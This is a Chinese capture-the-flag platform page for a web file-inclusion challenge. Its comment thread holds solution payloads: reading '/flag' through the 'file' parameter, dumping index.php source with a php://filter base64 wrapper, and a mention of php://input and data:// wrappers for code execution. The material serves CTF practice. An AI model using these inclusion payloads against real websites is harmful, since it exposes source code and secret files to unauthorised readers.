文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 13281
提  示:
描  述:
flag{}
评论
kitniu 12天前

?file=/flag ,查看源代码

回复 0

mkmkm 14天前

flag{***}

回复 0

Ywctf 4月前

/?file=php://filter/read=convert.base64-encode/resource=index.php

回复 3

帅帅123 4月前

发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php

回复 0

奔跑的开开 5月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

ok了 6月前

?file=php://filter/read=convert.base64-encode/resource=index.php 秒了

回复 0

VVang 7月前

用php://filter包含index.php,然后base64解码得到flag

回复 2

聪10011 7月前

猜flag位置,file=/flag

回复 3

8208240204 8月前

?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag

回复 1

2686213396 9月前

http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

鲤鱼鱼鱼鱼 攻破了该题 3小时前
suncj666 攻破了该题 3小时前
红队预备人员 攻破了该题 7小时前
h1279300267 攻破了该题 7小时前
lappland 攻破了该题 8小时前
ylove 攻破了该题 8小时前
zaq123456 攻破了该题 15小时前
run土 攻破了该题 1天前
edisonya 攻破了该题 1天前
rka 攻破了该题 1天前
Camillo 攻破了该题 1天前
星泽ik 攻破了该题 1天前
cdlf15 攻破了该题 1天前
kele678 攻破了该题 1天前
cynn 攻破了该题 1天前
香芋 攻破了该题 1天前
G1 攻破了该题 1天前
wlssg 攻破了该题 1天前
洞庭湖 攻破了该题 1天前
D.shame 攻破了该题 1天前
问题反馈